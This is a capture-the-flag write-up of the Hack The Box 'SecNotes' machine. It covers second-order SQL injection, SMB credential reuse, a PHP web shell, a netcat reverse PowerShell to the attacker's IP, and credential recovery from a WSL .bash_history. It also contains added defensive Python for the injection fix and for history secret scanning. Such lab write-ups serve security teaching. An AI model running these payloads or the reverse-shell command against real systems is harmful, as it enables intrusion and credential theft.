TL;DR
The username field was susceptible to a second-order SQL injection, allowing us to list other users' notes. One note contained credentials that let us log in to an SMB share whose files were also being served by a second IIS instance on port 8808. Uploading a web shell to the share gave us remote code execution, from which we spawned a persistent reverse shell. Enumerating the file system revealed a Windows Subsystem for Linux (WSL) Ubuntu install whose root user's .bash_history disclosed the administrator credentials used to connect to the c$ share of the SMB server, giving us access to download the root.txt flag.
User
As with any box we start with an Nmap scan. To get things underway quickly I perform only a partial scan: a TCP SYN scan (-sS) of the 1000 most common ports. I also give the -sV and -sC options, which mean that open ports are probed to determine the running service and its version, and the default NSE scripts are run against the relevant ports.
# nmap -sS -sV -sC -o nmap-tcp-initial.txt 10.10.10.97
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-15 15:49 GMT
Nmap scan report for 10.10.10.97
Host is up (0.042s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
|_tomcat-scan: /manager/html is HTTP 404.
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h40m00s, deviation: 4h37m10s, median: -1s
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2018-11-15T07:49:32-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-11-15 15:49:29
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.22 seconds
The scan finishes and reveals two open ports as well as some useful information about the system:
- An HTTP server on port 80. Nmap identifies it as Microsoft IIS httpd 10.0, a recent version, so the web server software itself is unlikely to be vulnerable; any weakness is more likely to be in the application it hosts.
- SMB (microsoft-ds) on port 445. From the script output the host operating system is Windows 10 (build 17134), the computer name is SECNOTES and SMB message signing is enabled but not required. The SMB scripts only got as far as the guest account, so we will need valid credentials to enumerate shares any further.
This points to the web application being the entry point for this box.
When opened in a browser we are redirected to http://10.10.10.97/login.php, a login page that also offers the option to create an account.

Let us create an account and see where it takes us.

After signing in we are redirected to the above page. Immediately we can see a potential user, [email protected]; this is likely to come in handy later, potentially with the SMB server. Now let's create a note and test for injections.
It appears that the notes are vulnerable to XSS, but it is unlikely that this will help us. However, to prevent our browser from running other users' XSS attempts, I would recommend disabling JavaScript for this site.
The Contact Us page also has an input field, potentially allowing us to capture an admin session if that field is susceptible to XSS too. I decided not to pursue this path, as cross-site scripting is fairly rare in labs such as Hack The Box because of the complexity of implementing it. In this case, however, there is a simulated user who provides another route to a user-level shell.
With this in mind, I log out and create a new user, this time testing the username and password fields. After trying a few potentially problematic usernames I was disheartened when nothing happened. It wasn't until I actually logged in with one of these usernames that a server error was thrown.

The username that caused this was a single quote ('), suggesting that the site is vulnerable to second-order SQL injection. The server error occurs on the home.php page, which normally displays the user's notes. The most likely explanation is that the username is stored safely by the registration form but is later concatenated, unescaped, into the query that fetches the logged-in user's notes. With this in mind, we can construct a username that makes that query return all notes, including those of other users. Creating a user with the username test' or '1'='1 is enough: after logging in with it, the notes of all users are displayed.
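As an added example (not code from the original write-up or from the box), the following Python script models the two-step bug described above with an in-memory SQLite database. The table layout, column names and queries are assumptions standing in for whatever login.php and home.php actually do; what it demonstrates is why the registration form shows nothing while home.php errors on a quote and returns every note for test' or '1'='1, and how binding the stored value fixes it.

```python
"""Second-order SQL injection, modelled on the login/notes bug described above.

Added example, not code from the original write-up or from the box: the
tables, columns and queries are assumptions standing in for whatever login.php
and home.php really do. The point is the two-step nature of the bug: the
username is stored safely (bound parameter) at registration and only breaks a
query when home.php later reads the stored value back and concatenates it.
"""
import sqlite3


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT);
        CREATE TABLE notes (id INTEGER PRIMARY KEY, username TEXT, title TEXT, body TEXT);
        """
    )
    # Constructed data: two existing users and three notes between them.
    db.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("tyler", "hunter2"), ("alice", "correct horse")],
    )
    db.executemany(
        "INSERT INTO notes (username, title, body) VALUES (?, ?, ?)",
        [
            ("tyler", "new site", "share credentials would go here"),
            ("alice", "todo", "buy milk"),
            ("alice", "diary", "nothing to see"),
        ],
    )
    db.commit()
    return db


def register(db: sqlite3.Connection, username: str, password: str) -> None:
    """Sign-up binds the username, so a quote is stored verbatim without any
    error: this is why probing the registration form alone revealed nothing."""
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))
    db.commit()


def stored_username(db: sqlite3.Connection, username: str) -> str:
    """What home.php would read back from the users table after login."""
    row = db.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        raise LookupError("no such user")
    return row[0]


def notes_vulnerable(db: sqlite3.Connection, username: str) -> list:
    """home.php as the write-up infers it: the stored value is concatenated into
    the notes query. Username "'" -> syntax error; "x' or '1'='1" -> every note."""
    stored = stored_username(db, username)
    query = "SELECT username, title FROM notes WHERE username = '" + stored + "'"
    return db.execute(query).fetchall()


def notes_fixed(db: sqlite3.Connection, username: str) -> list:
    """Same lookup with the stored value bound as a parameter: the payload is
    just an odd username that owns no notes."""
    stored = stored_username(db, username)
    return db.execute(
        "SELECT username, title FROM notes WHERE username = ?", (stored,)
    ).fetchall()


def home_page(db: sqlite3.Connection, username: str, vulnerable: bool = True) -> tuple:
    """Log in as `username` and render the notes list.
    Returns ("ok", rows) or ("error", message); the latter stands in for the
    server error the write-up saw on home.php."""
    try:
        rows = notes_vulnerable(db, username) if vulnerable else notes_fixed(db, username)
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("ok", rows)


if __name__ == "__main__":
    db = setup_db()
    for name in ["'", "test' or '1'='1"]:
        register(db, name, "password")  # registration never complains
        print(repr(name), "vulnerable:", home_page(db, name))
        print(repr(name), "fixed:     ", home_page(db, name, vulnerable=False))
```

Run it directly to see the two outcomes side by side. The fix is to treat data read back from the database exactly like fresh user input and bind it; the notes query is still an injection even though the registration INSERT was parameterised, which is what makes second-order bugs easy to miss in a review that only looks at the point where input first enters.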
There should be at least three notes plus any created by other users. If you've disabled JavaScript you won't be able to open the notes to see their contents; a simple workaround is to press Ctrl + U to view the page source. Meanwhile, if you didn't disable JavaScript, some other Hack The Box user probably now has your PHPSESSID cookie for secnotes.htb (or worse), and all your notes are at more risk than they already were!
Regardless, the most interesting of the notes contains credentials to a share on the SMB server.
\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&
With these we can use smbclient to connect to the new-site share.
# smbclient -U tyler //10.10.10.97/new-site
Enter WORKGROUP\tyler's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 15 15:57:29 2018
.. D 0 Thu Nov 15 15:57:29 2018
blabla.php A 56 Thu Nov 15 15:50:07 2018
iisstart.htm A 696 Thu Jun 21 16:26:03 2018
iisstart.png A 98757 Thu Jun 21 16:26:03 2018
Microsoft D 0 Thu Nov 15 15:51:37 2018
nc.exe A 38616 Thu Nov 15 15:49:37 2018
nc64.exe A 45272 Thu Nov 15 15:50:36 2018
rev-shell.php A 202 Thu Nov 15 15:54:08 2018
12978687 blocks of size 4096. 7911779 blocks available
Ignoring the files that are clearly other players' reverse shells, two files have been there significantly longer than the rest, so we can assume they weren't created by users. They appear to be from the default configuration of an Internet Information Services server; downloading iisstart.png with get and viewing it on my local machine confirms this. What does this mean? Somewhere there is a second IIS site being hosted, as these files aren't served by the instance on port 80. Since we can also upload files to this share, it most likely leads to remote code execution. But where is said server?

Oh... My desire for speed while scanning this box led to me missing an open port. Running the scan again, this time with the -p- option telling Nmap to scan the full port range, finds an additional port running a second IIS server...
8808/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
|_tomcat-scan: /manager/html is HTTP 404.
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Once the port is specified in the browser we see the Internet Information Services default landing page I previously downloaded. Now the route to user.txt is clear. We can create a minimal PHP web shell giving us the ability to execute commands and perform basic enumeration, which is enough to get the user.txt flag.
<?php system($_GET['cmd']); ?>
The above is enough to get the job done. We save it in a file with a .php extension and upload it to the share with put. Requesting that file on port 8808 gives us a rudimentary web shell: commands go in the cmd GET parameter. With web shells the output can often become difficult to read because the browser collapses whitespace and line breaks; a quick fix is to prefix the URL with view-source: so that the output is not rendered as HTML. After working out where the flag is we can print it with type C:\users\tyler\desktop\user.txt
Root
Now let's upgrade this web shell into an interactive shell. I found this to be a difficult process at first, as many of my shells dropped as soon as I spawned them. At the time I assumed antivirus was killing my sessions, and the method below got a shell to stick.
- First, upload ncat.exe to the SMB share; this is the Nmap project's ncat, a netcat for Windows.
- Then start the classic netcat listener on your client with nc -vlnp 443.
- Finally, use the existing web shell to spawn a reverse PowerShell to your client with:
cmd /K C:/inetpub/new-site/ncat.exe -nv 10.10.my.ip 443 -e powershell.exe
A short period after running the final command you should have a persistent user-level shell waiting for you.
# nc -vlnp 443
listening on [any] 443 ...
connect to [10.10.MY.IP] from (UNKNOWN) [10.10.10.97] 50039
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\inetpub\new-site>
Now it is a lot easier to navigate the file system. However, our shell still drops seemingly arbitrarily. Looking in tyler's files we find a PowerShell script in C:\users\tyler\cleanup named cleanup.ps1.
while($true) {
Write-Host "Cleaning up new-site!"
Get-ChildItem -Path "C:\inetpub\new-site" -Exclude iisstart.* | Select -ExpandProperty FullName | Remove-Item -Force
Write-Host "Sleeping for 5 minutes..."
Start-Sleep -s 300
}
From the code it is clear that this script deletes everything in the C:\inetpub\new-site directory every five minutes, which is most likely what was actually killing our shells: the web shell and ncat.exe were being removed from under us. However, the script excludes files matching iisstart.*, so we can evade it by prefixing our web shell and ncat.exe with iisstart., for example iisstart.shelly.php and iisstart.ncat.exe.
Continuing to look through the file system, we see an interesting directory in C:\: it appears that Ubuntu is installed on this box.
Directory: C:\Distros\Ubuntu
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/21/2018 3:07 PM AppxMetadata
d----- 6/21/2018 3:07 PM Assets
d----- 6/21/2018 3:07 PM images
d----- 6/21/2018 5:51 PM temp
-a---- 7/11/2017 6:10 PM 190434 AppxBlockMap.xml
-a---- 7/11/2017 6:10 PM 2475 AppxManifest.xml
-a---- 7/11/2017 6:11 PM 10554 AppxSignature.p7x
-a---- 7/11/2017 6:10 PM 201254783 install.tar.gz
-a---- 7/11/2017 6:10 PM 4840 resources.pri
-a---- 7/11/2017 6:10 PM 222208 ubuntu.exe
-a---- 7/11/2017 6:10 PM 809 [Content_Types].xml
How, you may ask? The box is running Windows 10, so they have made use of the Windows Subsystem for Linux (WSL), which allows Linux ELF binaries to be run on Windows. We can try to start an interactive bash shell, or execute commands in the subsystem, with bash or bash -c [command]; however, this gives an error and yields no response for me (possibly an issue with my shell). After a short period of googling we find that the Ubuntu file system is stored on disk under the app package's LocalState directory and is accessible from Windows.
Directory:
C:\users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs
Mode LastWriteTime Length Name
---- ------------- ------ ----
da---- 6/21/2018 6:03 PM bin
da---- 6/21/2018 6:00 PM boot
da---- 6/21/2018 6:00 PM dev
da---- 6/22/2018 3:00 AM etc
da---- 6/21/2018 6:00 PM home
da---- 6/21/2018 6:00 PM lib
da---- 6/21/2018 6:00 PM lib64
da---- 6/21/2018 6:00 PM media
da---- 6/21/2018 6:03 PM mnt
da---- 6/21/2018 6:00 PM opt
da---- 6/21/2018 6:00 PM proc
da---- 6/22/2018 2:44 PM root
da---- 6/21/2018 6:00 PM run
da---- 6/22/2018 2:57 AM sbin
da---- 6/21/2018 6:00 PM snap
da---- 6/21/2018 6:00 PM srv
da---- 6/21/2018 6:00 PM sys
da---- 6/22/2018 2:25 PM tmp
da---- 6/21/2018 6:02 PM usr
da---- 6/21/2018 6:03 PM var
-a---- 6/22/2018 2:25 PM 87944 init
Looking through the files we can see there is a sole user, root. This user doesn't have any user-created files. However, a record of the commands they executed has been stored by the shell in .bash_history, letting us learn what the user has been doing.
PS C:\users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> type .bash_history
type .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
exit
From this we can see credentials for the administrator user, typed directly into an smbclient command. Connecting with the same command they used gives us access to the full file system over the c$ share, so we can simply navigate to the Administrator's desktop, download the root.txt flag and print it locally.
smb: \Users\Administrator\Desktop\> ls
. DR 0 Sun Aug 19 18:01:17 2018
.. DR 0 Sun Aug 19 18:01:17 2018
desktop.ini AHS 282 Sun Aug 19 18:01:17 2018
Microsoft Edge.lnk A 1417 Sat Jun 23 00:45:06 2018
root.txt A 34 Sun Aug 19 18:03:54 2018
12978687 blocks of size 4096. 8049410 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
Takeaways
- There are more than 1000 ports - A balance between speed and thoroughness needs to be struck; a quick top-ports scan should always be followed up with a full -p- scan.
- Stay Safe - Some vulnerabilities can be used against you, and it is important to take the necessary steps to protect yourself.
- Keep it Simple - When an antivirus is running the simplest approaches can be the most effective, whilst your Meterpreter sessions will normally be flagged and killed almost immediately.
- Don't put Passwords in Commands - Putting passwords in commands is bad practice, as the passwords are then stored insecurely in logs such as .bash_history (and are visible in the process list while the command runs). If the password had been entered at the prompt we would only have a username, preventing our access.
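To make the last takeaway concrete, here is an added Python example (not code from the write-up or from the box) that scans a shell history for secrets passed on the command line. The history lines inside it are constructed, modelled on the smbclient user%password form recorded on the box plus a few other common ways credentials end up in argv; the regexes are heuristics for a handful of tools and will not catch everything.

```python
"""Scan a shell history for secrets passed on the command line.

Added example for the final takeaway; not code from the write-up or the box.
The sample history is constructed, modelled on the smbclient user%password
form recorded on the box plus other common ways secrets end up in argv.
"""
import re

# Constructed sample history. Lines 3, 5, 6, 7 and 8 leak a secret; lines 2 and
# 4 are the safe forms, where the tool prompts for the password instead.
SAMPLE_HISTORY = "\n".join([
    "cd /mnt/c/",
    "mount //127.0.0.1/c$ filesystem/ -o user=administrator",
    r"smbclient -U 'administrator%Sup3rSecret!' \\\\127.0.0.1\\c$",
    "smbclient -U administrator //127.0.0.1/c$",
    "mysql -u root -pToor123 notes",
    "curl -u svc:hunter2 http://intranet/api",
    "export AWS_SECRET_ACCESS_KEY=AKIAexamplekey",
    "git clone https://deploy:tok3n@example.com/repo.git",
    "less .bash_history",
])

# (label, regex). Each regex has exactly one capture group: the secret itself.
# These are heuristics for a handful of common tools, not a complete list.
PATTERNS = [
    ("smbclient -U user%password",
     re.compile(r"-U\s+['\"]?[^\s'\"%]+%([^\s'\"]+)")),
    ("mysql -pPASSWORD with no space",
     re.compile(r"\s-p([^\s-]\S*)")),
    ("curl -u user:password",
     re.compile(r"-u\s+['\"]?[^\s:'\"]+:([^\s'\"]+)")),
    ("credential embedded in a URL",
     re.compile(r"://[^/\s:@]+:([^/\s@]+)@")),
    ("secret assigned to an environment variable",
     re.compile(r"\b\w*(?:PASS|PASSWORD|SECRET|TOKEN)\w*=(\S+)")),
]


def find_leaked_credentials(history: str) -> list:
    """Return (line_number, label, secret) for every history line that carries
    a secret in argv. Only the first matching pattern per line is reported."""
    hits = []
    for lineno, line in enumerate(history.splitlines(), start=1):
        for label, pattern in PATTERNS:
            match = pattern.search(line)
            if match:
                hits.append((lineno, label, match.group(1)))
                break
    return hits


def redact_history(history: str) -> str:
    """Rewrite the history with each detected secret replaced, keeping the
    command and the username so the record is still useful for forensics."""
    lines = history.splitlines()
    for lineno, _label, secret in find_leaked_credentials(history):
        lines[lineno - 1] = lines[lineno - 1].replace(secret, "<redacted>")
    return "\n".join(lines)


if __name__ == "__main__":
    for lineno, label, secret in find_leaked_credentials(SAMPLE_HISTORY):
        print(f"line {lineno}: {label}: {secret}")
    print()
    print(redact_history(SAMPLE_HISTORY))
```

smbclient, like most of the tools above, prompts for the password when only the username is given (smbclient -U administrator ...) or reads it from a file passed with -A, so the secret never reaches the history file. Anything this scanner matches was also visible to every local user in the process list for as long as the command ran.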